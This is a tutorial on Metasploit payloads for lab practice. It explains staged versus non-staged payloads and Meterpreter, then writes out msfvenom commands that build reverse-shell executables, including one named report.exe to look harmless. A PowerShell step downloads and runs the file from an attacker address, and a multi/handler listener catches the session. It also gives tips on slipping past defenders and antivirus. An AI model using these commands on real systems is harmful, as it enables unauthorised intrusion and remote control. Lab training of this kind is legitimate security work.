Metasploit Payloads

The Payload Is Its Own Decision

The exploit only gets you through the door.

What you actually hold once inside is the payload. A weak choice hands you a flaky, cramped shell. A good one hands you file transfer, encryption, and a foothold that survives.

So the payload deserves real thought, not a default.


Staged vs Non-Staged

Every Metasploit payload ships in one of two shapes. This trips people up, so watch it carefully.


Non-staged is all-in-one. The complete payload travels in a single piece.

  • Bigger on the wire
  • Simple and stable
  • Nothing to fetch afterward

Staged splits in two. A tiny stager goes first, phones home, and pulls the real stage down into memory.

  • Tiny first hop
  • Fits tight spaces where a full payload wouldn’t
  • The stage loads in memory, which can slip past defenders watching for a whole payload

There’s a naming tell that saves you every time:

NameShape
shell_reverse_tcpnon-staged (underscore)
shell/reverse_tcpstaged (slash)

Underscore is one piece; slash is split. When an exploit has almost no room for shellcode, reach for the staged version.


Meterpreter

The payload you’ll want most is Meterpreter.

It’s not a plain shell. It’s a multi-function payload that:

  • lives entirely in memory (nothing written to disk)
  • encrypts all its traffic
  • carries built-in commands for files, processes, pivoting, and privilege work

A few of its everyday commands:

meterpreter > sysinfo         # OS, architecture, hostname
meterpreter > getuid          # who you are running as
meterpreter > download secret.txt
meterpreter > upload tool.exe
meterpreter > shell           # drop to a normal shell when you want one

One variant is worth knowing by name: meterpreter_reverse_https.

Its traffic looks like ordinary HTTPS, and it’s encrypted, so a defender watching the wire sees routine web traffic, not a shell.

Meterpreter is Metasploit’s crown jewel, and its most-signatured code. Antivirus knows it well. The usual play: get a plain shell first, and only bring in Meterpreter once you’ve handled the defenses.


msfvenom: Payloads as Files

Sometimes you don’t have an exploit module, you just need the payload as a file: a Windows .exe, a Linux binary, a web shell.

That’s msfvenom. List what’s available:

$ msfvenom -l payloads --platform windows --arch x64

Then build one. Set the payload with -p, your address with LHOST/LPORT, the file format with -f, and the output name with -o:

$ msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.14.5 LPORT=443 -f exe -o shell.exe

Drop it on the target, run it, and catch the shell.


Catching What You Sent

Here’s the catch that bites everyone.

  • A non-staged raw shell (the underscore kind) can be caught with plain Netcat.
  • A staged payload, or any Meterpreter, cannot. Netcat has no idea how to send the second stage.

For those, you need Metasploit’s own listener: multi/handler.

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter_reverse_https
msf6 exploit(multi/handler) > set LHOST 10.10.14.5
msf6 exploit(multi/handler) > set LPORT 443
msf6 exploit(multi/handler) > run -j

The handler’s payload must match the file exactly. Build with meterpreter_reverse_https, catch with meterpreter_reverse_https. Mismatch and the connection dies on arrival.


So the full flow for a Meterpreter binary is: build with msfvenom, start multi/handler, run the file, catch the session.

$ msfvenom -p windows/x64/meterpreter_reverse_https LHOST=10.10.14.5 LPORT=443 -f exe -o report.exe

Then on the target, pull it down and run it:

PS> iwr -uri http://10.10.14.5/report.exe -Outfile report.exe
PS> .\report.exe

Your multi/handler lights up with a fresh Meterpreter session.


Practice Boxes

  • Devel - HackTheBox. Upload an msfvenom payload to an open web root and catch Meterpreter.
  • Jerry - HackTheBox. Deploy an msfvenom payload through a Tomcat manager for an easy shell.
  • Blue - TryHackMe. Exploit, then explore a real Meterpreter session end to end.